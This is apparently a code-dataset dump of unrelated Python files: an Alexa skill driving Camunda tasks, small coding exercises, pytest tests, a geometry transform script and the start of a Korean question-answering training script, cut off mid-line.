logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass ZahlungSpaeterIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe \"zahlungsart bestimmen\", Gast zahlt später.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"ZahlungSpaeterIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung servieren\":\n try:\n request_body = {\n \"variables\": {\n \"direkt\": {\n \"type\": \"boolean\",\n \"value\": \"false\"\n }\n }\n }\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json=request_body)\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\n# Angepasster Abschluss\nclass BestellungZubereitenIntentHandler(AbstractRequestHandler):\n \"\"\"An den Task \"bestellung-zubereiten\" angepasster Handler.\n Anpassung des Interaktionsmodells an den Use Case.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"BestellungZubereitenIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n if current_task['name'] == \"bestellung zubereiten\":\n try:\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/complete\", json={})\n if r.status_code != 204:\n logger.info(\n f\"{current_task['name']}, Error bei Complete-Request\")\n raise Exception(\"Post failed\")\n speak_output = no_or_new_task()\n except:\n return complete_task_failed(handler_input)\n else:\n speak_output = \"das ist nicht deine aufgabe.\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\nclass AufgabeVorIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe überspringen. Generischer Handler.\n Alle Aufgaben lassen sich damit überspringen.\n Entweder die nächste, zugewiesene aufgabe wird zugewiesen oder die neuere aufgabe, die dem nutzer bereits zugewiesen wurde, wird ausgegeben.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeVorIntent\")(handler_input)\n\n def handle(self, handler_input):\n global current_task\n\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n try:\n alle_meine_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?assignee={current_user}&sortBy=created&sortOrder=asc\")\n if alle_meine_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n alle_meine_tasks = alle_meine_tasks_request.json()\n if len(alle_meine_tasks) > 1:\n next_task_index = alle_meine_tasks.index(current_task) + 1\n if next_task_index > (len(alle_meine_tasks) - 1):\n return (\n handler_input.response_builder\n .speak(f\"es gibt keine neuere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current task\")\n\n current_task = alle_meine_tasks[next_task_index]\n return (\n handler_input.response_builder\n .speak(f\"ich habe deine aufgabe übersprungen. deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n else:\n date = current_task['created']\n date = date.replace(\"+\", \"%2B\")\n\n newer_unassigend_service_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?candidateGroup={current_group}&unassigned=true&createdAfter={date}&sortBy=created&sortOrder=asc\")\n if newer_unassigend_service_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n if len(newer_unassigend_service_tasks_request.json()) > 0:\n new_task = newer_unassigend_service_tasks_request.json()[0]\n r = requests.post(\n f\"{camunda_url}/rest/task/{new_task['id']}/assignee\", json={\"userId\": current_user})\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current taks\")\n\n get_current_task(assignee=current_user)\n speak_output = f\"ich habe deine aufgabe übersprungen. deine neue aufgabe ist: {current_task['name']}. {current_task['description']}\"\n else:\n speak_output = f\"es gibt keine neuere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n except:\n logger.info(\"Unable to get new task\")\n return (\n handler_input.response_builder\n .speak(f\"ich konnte dir keine neue aufgabe zuweisen. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeZurueckIntentHandler(AbstractRequestHandler):\n \"\"\"Aufgabe zurück, wird nach einem überspringen aufgerufen.\n Funktioniert allerdings nicht in jedem Fall. Bspw. wenn eine viel aktuellere aufgabe zuvor zugewiesen wurde.\n \"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeZurueckIntent\")(handler_input)\n\n def handle(self, handler_input):\n if current_task is None:\n get_current_task(assignee=current_user)\n\n if current_task is None:\n return no_task_assigned(handler_input)\n\n try:\n date = current_task['created']\n date = date.replace(\"+\", \"%2B\")\n\n older_unassigned_service_tasks_request = requests.get(\n f'{camunda_url}/rest/task?candidateGroup={current_group}&unassigned=true&createdBefore={date}&sortBy=created&sortOrder=asc')\n if older_unassigned_service_tasks_request.status_code != 200:\n raise Exception(\"Request failed\")\n logger.info(older_unassigned_service_tasks_request.json())\n len_list = len(older_unassigned_service_tasks_request.json())\n logger.info(len_list)\n if len_list > 0:\n new_task = older_unassigned_service_tasks_request.json()[\n len_list - 1]\n r = requests.post(\n f\"{camunda_url}/rest/task/{new_task['id']}/assignee\", json={\"userId\": current_user})\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n\n # unclaim, egal bei fail\n r = requests.post(\n f\"{camunda_url}/rest/task/{current_task['id']}/unclaim\", json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current taks\")\n get_current_task(assignee=current_user)\n speak_output = f\"okay. deine aufgabe ist: {current_task['name']}. {current_task['description']}\"\n else:\n speak_output = f\"es gibt keine freie ältere aufgabe. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\"\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n except:\n logger.info(\"Unable to get old task\")\n return (\n handler_input.response_builder\n .speak(f\"ich konnte dir die aufgabe nicht zuweisen. deine aufgabe ist weiterhin: {current_task['name']}. {current_task['description']}\")\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeFreigebenIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Freigabe von Aufgaben.\n Generisch, geht mit jeder Aufgabe.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeFreigebenIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n\n try:\n # unclaim, wenn current_task == NOne, kein problem wegen try catch\n r = requests.post(\n f'{camunda_url}/rest/task/{current_task[\"id\"]}/unclaim', json={})\n if r.status_code != 204:\n raise Exception(\"Unable to unclaim current task\")\n speak_output = \"ich habe deine aufgabe freigegeben.\"\n except:\n speak_output = \"ich konnte deine aufgabe nicht freigeben.\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response)\n\n\nclass AufgabeUebergabeIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Übergeben von Aufgaben an andere Personen. An sich generisch, aber man muss die Personen angeben.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AufgabeUebergabeIntent\")(handler_input)\n\n def handle(self, handler_input):\n get_current_task(assignee=current_user)\n person = ask_utils.request_util.get_slot_value(\n handler_input, \"person\") # this slot is required!\n if (person != \"julian\" and person != \"felix\" and person != \"anna\"):\n return (\n handler_input.response_builder\n .add_directive(ElicitSlotDirective(slot_to_elicit=\"person\"))\n .speak(f\"{person} kenne ich nicht. du kannst die aufgabe an julian oder felix übergeben. an wen möchtest du die aufgabe übergeben?\")\n .ask('an wen möchtest du die aufgabe übergeben?')\n .response)\n try:\n alle_person_tasks_request = requests.get(\n f'{camunda_url}/rest/task?assignee={person}&sortBy=created&sortOrder=asc')\n if alle_person_tasks_request.status_code != 200:\n raise Exception(\"Unable to retrieve tasks\")\n alle_person_tasks = alle_person_tasks_request.json()\n if (len(alle_person_tasks) < 2):\n r = requests.post(f'{camunda_url}/rest/task/{current_task[\"id\"]}/assignee', json={\n \"userId\": person}) # set assignee without checking\n if r.status_code != 204:\n raise Exception(\"Unable to assign new task\")\n else:\n raise Exception(\"Already two tasks assigned\")\n\n get_current_task(assignee=current_user)\n\n if current_task is None:\n claim_new_task(candidateGroup=current_group,\n assignee=current_user)\n\n if current_task is None:\n speak_output = f\"ich habe deine aufgabe an {person} übergeben. aktuell gibt es keine weiteren verfügbaren aufgaben.\"\n else:\n speak_output = f\"ich habe deine aufgabe an {person} übergeben. deine neue aufgabe lautet: {current_task['name']}. {current_task['description']}\"\n except:\n speak_output = \"ich konnte deine aufgabe nicht übergeben\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .set_should_end_session(False)\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler für Hilfe.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n speak_output = \"du kannst zum beispiel details zu deiner aufgabe erfragen, deine aufgabe abschließen, übergeben oder freigeben. was möchtest du tun?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Wenn der Nutzer Stopp/Abbruch sagt.\"\"\"\n\n def can_handle(self, handler_input):\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n speak_output = \"bis bald!\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass SessionEndedRequestHandler(AbstractRequestHandler):\n \"\"\"Handler für Ende der Session.\"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"SessionEndedRequest\")(handler_input)\n\n def handle(self, handler_input):\n global current_task\n current_task = None\n\n return handler_input.response_builder.response\n\n\nclass IntentReflectorHandler(AbstractRequestHandler):\n \"\"\"The intent reflector is used for interaction model testing and debugging.\n It will simply repeat the intent the user said. You can create custom handlers\n for your intents by defining them above, then also adding them to the request\n handler chain below.\n \"\"\"\n\n def can_handle(self, handler_input):\n return ask_utils.is_request_type(\"IntentRequest\")(handler_input)\n\n def handle(self, handler_input):\n intent_name = ask_utils.get_intent_name(handler_input)\n speak_output = \"You just triggered \" + intent_name + \".\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .response\n )\n\n\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"Generic error handling to capture any syntax or routing errors. If you receive an error\n stating the request handler chain is not found, you have not implemented a handler for\n the intent being invoked or included it in the skill builder below.\n \"\"\"\n\n def can_handle(self, handler_input, exception):\n return True\n\n def handle(self, handler_input, exception):\n logger.error(exception, exc_info=True)\n\n speak_output = \"das habe ich leider nicht verstanden. kannst du das bitte wiederholen?\"\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n# The SkillBuilder object acts as the entry point for your skill, routing all request and response\n# payloads to the handlers above. Make sure any new handlers or interceptors you've\n# defined are included below. The order matters - they're processed top to bottom.\n\n\nsb = SkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(AufgabeAbschlussIntentHandler())\nsb.add_request_handler(WagenVorbereitenIntentHandler())\nsb.add_request_handler(ZahlungSpaeterIntentHandler())\nsb.add_request_handler(ZahlungSofortIntentHandler())\nsb.add_request_handler(ServierenIntentHandler())\nsb.add_request_handler(BestellungZubereitenIntentHandler())\nsb.add_request_handler(AufgabeDetailsIntentHandler())\nsb.add_request_handler(AufgabeVorIntentHandler())\nsb.add_request_handler(AufgabeZurueckIntentHandler())\nsb.add_request_handler(AufgabeFreigebenIntentHandler())\nsb.add_request_handler(AufgabeUebergabeIntentHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(CancelOrStopIntentHandler())\nsb.add_request_handler(SessionEndedRequestHandler())\n# make sure IntentReflectorHandler is last so it doesn't override your custom intent handlers\nsb.add_request_handler(IntentReflectorHandler())\n\nsb.add_exception_handler(CatchAllExceptionHandler())\n\nlambda_handler = sb.lambda_handler()\n","sub_path":"thesis-msi/thesis-prototyp/alexa-skills/aufgaben_anna/lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":31606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"412947060","text":"# テキストのファイルを開く\nf = open(\"alice.txt\", \"r\", encoding=\"utf-8\")\n\n# 言い換えディクショナリを作成\ntrans = { 't':'i', 'l':'I', 'O':'0'}\n\n# ファイルを 1行ずつ処理する\nfor line in f:\n s = ''\n for c in line:\n if c in trans:\n s = trans.get(c)\n else:\n s = c\n print(s)\n\nf.close()\n","sub_path":"1612/161227_kadai3-1.py","file_name":"161227_kadai3-1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"439948365","text":"# ##################################################################################################\n# Copyright (c) 2020 - Fundação CERTI\n# All rights reserved.\n# ##################################################################################################\n\nimport numpy\nimport pytest\nfrom qda_modelos import cyanobacteria\n\n\nclass TestCyanobacteriaDashEtAl2011:\n def test_expected_result_type(self, setup_bands):\n R20m_bands = setup_bands[\"20m\"]\n\n dash_et_al_2011_result = cyanobacteria.dash_et_al_2011(\n R20m_bands[\"B03\"], R20m_bands[\"B02\"]\n )\n\n assert isinstance(dash_et_al_2011_result, numpy.ndarray)\n\n def test_expected_result_shape(self, setup_bands):\n R20m_bands = setup_bands[\"20m\"]\n\n dash_et_al_2011_result = cyanobacteria.dash_et_al_2011(\n R20m_bands[\"B03\"], R20m_bands[\"B02\"]\n )\n\n assert dash_et_al_2011_result.shape == R20m_bands[\"B03\"].shape\n\n def test_expected_error_for_wrong_number_of_bands(self, setup_bands):\n B03 = setup_bands[\"20m\"][\"B03\"]\n\n with pytest.raises(TypeError):\n cyanobacteria.dash_et_al_2011(B03)\n\n def test_expected_error_for_bands_of_different_shapes(self, setup_bands):\n B03 = setup_bands[\"20m\"][\"B03\"]\n B02 = setup_bands[\"10m\"][\"B02\"]\n\n with pytest.raises(ValueError):\n cyanobacteria.dash_et_al_2011(B03, B02)\n","sub_path":"tests/test_cyanobacteria_dash_et_al_2011.py","file_name":"test_cyanobacteria_dash_et_al_2011.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"163488553","text":"# 문제: https://programmers.co.kr/learn/courses/30/lessons/42583\n\ndef solution(bridge_length, weight, truck_weights):\n answer = 0\n on_bridge = [0] * bridge_length\n \n while len(on_bridge):\n answer += 1\n on_bridge.pop(0)\n if truck_weights:\n if sum(on_bridge) + truck_weights[0] <= weight:\n on_bridge.append(truck_weights.pop(0))\n else:\n on_bridge.append(0)\n \n return answer\n \n","sub_path":"스터디2주차/다리를지나는트럭.py","file_name":"다리를지나는트럭.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"77049568","text":"def isPrime(x):\n for n in range(2,x):\n if x%n is 0:\n return False\n return True\n\ncont = 0\n\nfor h in range(2,10000000):\n if isPrime(h) is True:\n cont=cont+1\n print(h, cont)\n if cont is 10001:\n print(\"found it:\",h,cont)\n break","sub_path":"problems001to099/Problem07.py","file_name":"Problem07.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"362318196","text":"import urllib.request, urllib.parse, urllib.error\n\nimg = urllib.request.urlopen('http://data.pr4e.org/cover3.jpg')\nman_a = open('portada.jpg', 'wb')\ntamano = 0\nwhile True:\n info = img.read(100000)\n if len(info) < 1: break\n tamano = tamano + len(info)\n man_a.write(info)\n\nprint(tamano, 'caracteres copiados.')\nman_a.close()\n","sub_path":"code3/curl2.py","file_name":"curl2.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"377415479","text":"import sys\nimport Line_Point\n\n'''\nfor each input line L\n repeat count times\n rotate L counter clockwise about the origin by angle\n scale L about the origin by factor\n translate L horizontally by delta_x\n translate L vertically by delta_y\n print L to stdout\n\npreconditions\n\teach file in stdin is a legal lines file\n'''\n\nvar_list = ['angle', 'factor', 'count', 'delta_x', 'delta_y']\noption_map = {'angle':'-a', 'factor':'-f', 'count':'-n', 'delta_x':'-x', 'delta_y':'-y'}\noption_vals = {'-a':'0.0','-f':'1.0','-n':'1','-x':'0.0','-y':'0.0'}\n\noptions_list = []\nfiles_list = []\n\n# break command line input into options list and files list\nstart_options = end_options = i = 1\nwhile(i> sys.stderr, 'Duplicate option:', option\n sys.exit() \n else:\n print >> sys.stderr, 'Illegal option:', option\n sys.exit()\n\n# assign option values to relevant variables, check for valid values\nfor variable in var_list:\n value = option_vals[option_map[variable]]\n try:\n if variable == 'count' or variable == 'spoke':\n globals()[variable]=int(value)\n else:\n globals()[variable]=float(option_vals[option_map[variable]])\n except ValueError:\n print >> sys.stderr,'Illegal option value:',option_map[variable],option_vals[option_map[variable]]\n sys.exit() \n\n# read lines from files and perform rotate, scale, translate on them\nif len(files_list)>0:\n for file in files_list:\n try:\n \tf = open(file,'r')\n except IOError:\n \tprint >> sys.stderr, 'Cannot open file:', file\n \tsys.exit()\n for x in f:\n \tx = x.replace('\\n', '') # remove line terminator: Linux\n \tx = x.replace('\\r\\n', '') # remove line terminator: Windows\n with open(file) as open_file:\n file_data = open_file.readlines()\n for file_line in file_data:\n L = file_line.split()\n point0 = Line_Point.Point(float(L[1]), float(L[2]))\n point1 = Line_Point.Point(float(L[3]), float(L[4]))\n line = Line_Point.Line(point0, point1)\n for i in range(count):\n line.rotate(angle)\n line.scale(factor)\n line.translate(delta_x,delta_y)\n print ('line', line)\n \n \n# read lines from stdin and perform rotate, scale, translate on them\nelse: \n for line in sys.stdin:\n L = line.split()\n point0 = Line_Point.Point(float(L[1]), float(L[2]))\n point1 = Line_Point.Point(float(L[3]), float(L[4]))\n line = Line_Point.Line(point0, point1)\n for i in range(count):\n line.rotate(angle)\n line.scale(factor)\n line.translate(delta_x,delta_y)\n print ('line', line)\n \n \n \n","sub_path":"rotate_scale_translate.py","file_name":"rotate_scale_translate.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"50035298","text":"import logging\r\nimport os\r\nimport sys\r\nimport wandb\r\n\r\nfrom typing import NoReturn\r\nfrom datasets import load_metric, load_from_disk, DatasetDict\r\n\r\nfrom transformers import AutoConfig, AutoModelForQuestionAnswering, AutoTokenizer\r\nfrom transformers import (\r\n DataCollatorWithPadding,\r\n EvalPrediction,\r\n HfArgumentParser,\r\n TrainingArguments,\r\n set_seed,\r\n)\r\nfrom transformers.trainer_utils import IntervalStrategy\r\n\r\nfrom reader.conv import custom_model\r\nfrom utils.utils_qa import postprocess_qa_predictions, check_no_error\r\nfrom utils.trainer_qa import QuestionAnsweringTrainer\r\nfrom arguments import (\r\n ModelArguments,\r\n DataTrainingArguments,\r\n)\r\n\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef main():\r\n\r\n # 가능한 arguments 들은 ./arguments.py 나 transformer package 안의 src/transformers/training_args.py 에서 확인 가능합니다.\r\n # --help flag 를 실행시켜서 확인할 수 도 있습니다.\r\n\r\n parser = HfArgumentParser(\r\n (ModelArguments, DataTrainingArguments, TrainingArguments)\r\n )\r\n model_args, data_args, training_args = parser.parse_args_into_dataclasses()\r\n print(model_args.model_name_or_path)\r\n\r\n # [참고] argument를 manual하게 수정하고 싶은 경우에 아래와 같은 방식을 사용할 수 있습니다\r\n # training_args.per_device_train_batch_size = 4\r\n # print(training_args.per_device_train_batch_size)\r\n training_args.evaluation_strategy=IntervalStrategy.STEPS\r\n training_args.logging_steps=250\r\n training_args.eval_steps=250\r\n training_args.save_total_limit=3\r\n training_args.load_best_model_at_end=True\r\n training_args.metric_for_best_model='em'\r\n\r\n # wandb 설정\r\n # entity는 wandb login으로 자동 설정됩니다. entity를 변경하고 싶으시면 relogin하면 됩니다!\r\n os.environ[\"WANDB_ENTITY\"] = \"채워주세요\" # 프로젝트 명 e.g. bc-ai-it-mrc\r\n os.environ[\"WANDB_PROJECT\"] = \"채워주세요\" # 프로젝트 명 e.g. T2211_dev\r\n\r\n training_args.report_to = [\"wandb\"]\r\n training_args.run_name = model_args.model_name_or_path # 프로젝트 내 모델 run 이름 ex) [ㅇㅇㅇ]klue/roberta-base\r\n\r\n print(f'====================================')\r\n print(training_args)\r\n print(f'====================================')\r\n\r\n print(f\"model is from {model_args.model_name_or_path}\")\r\n print(f\"data is from {data_args.dataset_name}\")\r\n\r\n # logging 설정\r\n logging.basicConfig(\r\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\r\n datefmt=\"%m/%d/%Y %H:%M:%S\",\r\n handlers=[logging.StreamHandler(sys.stdout)],\r\n )\r\n\r\n # verbosity 설정 : Transformers logger의 정보로 사용합니다 (on main process only)\r\n logger.info(\"Training/evaluation parameters %s\", training_args)\r\n\r\n # 모델을 초기화하기 전에 난수를 고정합니다.\r\n set_seed(training_args.seed)\r\n\r\n datasets = load_from_disk(data_args.dataset_name)\r\n print(datasets)\r\n\r\n # AutoConfig를 이용하여 pretrained model 과 tokenizer를 불러옵니다.\r\n # argument로 원하는 모델 이름을 설정하면 옵션을 바꿀 수 있습니다.\r\n\r\n tokenizer = AutoTokenizer.from_pretrained(\r\n model_args.tokenizer_name\r\n if model_args.tokenizer_name is not None\r\n else model_args.model_name_or_path,\r\n # 'use_fast' argument를 True로 설정할 경우 rust로 구현된 tokenizer를 사용할 수 있습니다.\r\n # False로 설정할 경우 python으로 구현된 tokenizer를 사용할 수 있으며,\r\n # rust version이 비교적 속도가 빠릅니다.\r\n use_fast=True,\r\n )\r\n\r\n if model_args.model_type == 'default':\r\n config = AutoConfig.from_pretrained(\r\n model_args.config_name\r\n if model_args.config_name is not None\r\n else model_args.model_name_or_path,\r\n )\r\n\r\n model = AutoModelForQuestionAnswering.from_pretrained(\r\n model_args.model_name_or_path,\r\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\r\n config=config,\r\n )\r\n elif model_args.model_type == 'custom':\r\n model = custom_model.CustomModelForQuestionAnswering() # conv-based custom model\r\n else:\r\n raise ValueError('[ Model Type Not Found ] 해당하는 모델 유형이 없습니다.')\r\n\r\n print(\r\n type(training_args),\r\n type(model_args),\r\n type(datasets),\r\n type(tokenizer),\r\n type(model),\r\n )\r\n\r\n # do_train mrc model 혹은 do_eval mrc model\r\n if training_args.do_train or training_args.do_eval:\r\n run_mrc(data_args, training_args, model_args, datasets, tokenizer, model)\r\n \r\n wandb.finish()\r\n\r\n\r\ndef run_mrc(\r\n data_args: DataTrainingArguments,\r\n training_args: TrainingArguments,\r\n model_args: ModelArguments,\r\n datasets: DatasetDict,\r\n tokenizer,\r\n model,\r\n)-> NoReturn:\r\n \"\"\"\r\n Perform Machine Reading Comprehension(MRC) task\r\n \r\n Args:\r\n data_args (:obj:`DataTrainingArguments`):\r\n Arguments pertaining to what data we are going to input our model for training and eval.\r\n \r\n training_args (:obj:`TrainingArguments`):\r\n Arguments we use in our example scripts which relate to the training loop itself.\r\n \r\n model_args (:obj:`ModelArguments`):\r\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\r\n\r\n datasets (:obj:`DatasetDict`):\r\n train-valid dataset\r\n\r\n tokenizer (:obj:`AutoTokenizer.from_pretrained`):\r\n tokenizer classes of the pretrained model vocabulary.\r\n\r\n model (:obj:`AutoModelForQuestionAnswering.from_pretrained`):\r\n model classes of the question answering from a pretrained model.\r\n\r\n \"\"\"\r\n # dataset을 전처리합니다.\r\n # training과 evaluation에서 사용되는 전처리는 아주 조금 다른 형태를 가집니다.\r\n if training_args.do_train:\r\n column_names = datasets[\"train\"].column_names\r\n else:\r\n column_names = datasets[\"validation\"].column_names\r\n\r\n question_column_name = \"question\" if \"question\" in column_names else column_names[0]\r\n context_column_name = \"context\" if \"context\" in column_names else column_names[1]\r\n answer_column_name = \"answers\" if \"answers\" in column_names else column_names[2]\r\n\r\n # Padding에 대한 옵션을 설정합니다.\r\n # (question|context) 혹은 (context|question)로 세팅 가능합니다.\r\n pad_on_right = tokenizer.padding_side == \"right\"\r\n\r\n # 오류가 있는지 확인합니다.\r\n last_checkpoint, max_seq_length = check_no_error(\r\n data_args, training_args, datasets, tokenizer\r\n )\r\n\r\n # Train preprocessing / 전처리를 진행합니다.\r\n def prepare_train_features(examples):\r\n \"\"\"\r\n preprocessing data for training\r\n\r\n Args:\r\n examples (:obj:`DatasetDict`):\r\n train data to be preprocessed\r\n\r\n Returns:\r\n tokenized_examples(:obj:`DatasetDict`):\r\n preprocessed train data\r\n \"\"\"\r\n # truncation과 padding(length가 짧을때만)을 통해 toknization을 진행하며, stride를 이용하여 overflow를 유지합니다.\r\n # 각 example들은 이전의 context와 조금씩 겹치게됩니다.\r\n tokenized_examples = tokenizer(\r\n examples[question_column_name if pad_on_right else context_column_name],\r\n examples[context_column_name if pad_on_right else question_column_name],\r\n truncation=\"only_second\" if pad_on_right else \"only_first\",\r\n max_length=max_seq_length,\r\n stride=data_args.doc_stride,\r\n return_overflowing_tokens=True,\r\n return_offsets_mapping=True,\r\n #return_token_type_ids=False, # roberta모델을 사용할 경우 False, bert를 사용할 경우 True로 표기해야합니다.\r\n padding=\"max_length\" if data_args.pad_to_max_length else False,\r\n )\r\n\r\n # 길이가 긴 context가 등장할 경우 truncate를 진행해야하므로, 해당 데이터셋을 찾을 수 있도록 mapping 가능한 값이 필요합니다.\r\n sample_mapping = tokenized_examples.pop(\"overflow_to_sample_mapping\")\r\n # token의 캐릭터 단위 position를 찾을 수 있도록 offset mapping을 사용합니다.\r\n # start_positions과 end_positions을 찾는데 도움을 줄 수 있습니다.\r\n offset_mapping = tokenized_examples.pop(\"offset_mapping\")\r\n\r\n # 데이터셋에 \"start position\", \"enc position\" label을 부여합니다.\r\n tokenized_examples[\"start_positions\"] = []\r\n tokenized_examples[\"end_positions\"] = []\r\n\r\n for i, offsets in enumerate(offset_mapping):\r\n input_ids = tokenized_examples[\"input_ids\"][i]\r\n cls_index = input_ids.index(tokenizer.cls_token_id) # cls index\r\n\r\n # sequence id를 설정합니다 (to know what is the context and what is the question).\r\n sequence_ids = tokenized_examples.sequence_ids(i)\r\n\r\n # 하나의 example이 여러개의 span을 가질 수 있습니다.\r\n sample_index = sample_mapping[i]\r\n answers = examples[answer_column_name][sample_index]\r\n\r\n # answer가 없을 경우 cls_index를 answer로 설정합니다(== example에서 정답이 없는 경우 존재할 수 있음).\r\n if len(answers[\"answer_start\"]) == 0:\r\n tokenized_examples[\"start_positions\"].append(cls_index)\r\n tokenized_examples[\"end_positions\"].append(cls_index)\r\n else:\r\n # text에서 정답의 Start/end character index\r\n start_char = answers[\"answer_start\"][0]\r\n end_char = start_char + len(answers[\"text\"][0])\r\n\r\n # text에서 current span의 Start token index\r\n token_start_index = 0\r\n while sequence_ids[token_start_index] != (1 if pad_on_right else 0):\r\n token_start_index += 1\r\n\r\n # text에서 current span의 End token index\r\n token_end_index = len(input_ids) - 1\r\n while sequence_ids[token_end_index] != (1 if pad_on_right else 0):\r\n token_end_index -= 1\r\n\r\n # 정답이 span을 벗어났는지 확인합니다(정답이 없는 경우 CLS index로 label되어있음).\r\n if not (\r\n offsets[token_start_index][0] <= start_char\r\n and offsets[token_end_index][1] >= end_char\r\n ):\r\n tokenized_examples[\"start_positions\"].append(cls_index)\r\n tokenized_examples[\"end_positions\"].append(cls_index)\r\n else:\r\n # token_start_index 및 token_end_index를 answer의 끝으로 이동합니다.\r\n # Note: answer가 마지막 단어인 경우 last offset을 따라갈 수 있습니다(edge case).\r\n while (\r\n token_start_index < len(offsets)\r\n and offsets[token_start_index][0] <= start_char\r\n ):\r\n token_start_index += 1\r\n tokenized_examples[\"start_positions\"].append(token_start_index - 1)\r\n while offsets[token_end_index][1] >= end_char:\r\n token_end_index -= 1\r\n tokenized_examples[\"end_positions\"].append(token_end_index + 1)\r\n\r\n return tokenized_examples\r\n\r\n if training_args.do_train:\r\n if \"train\" not in 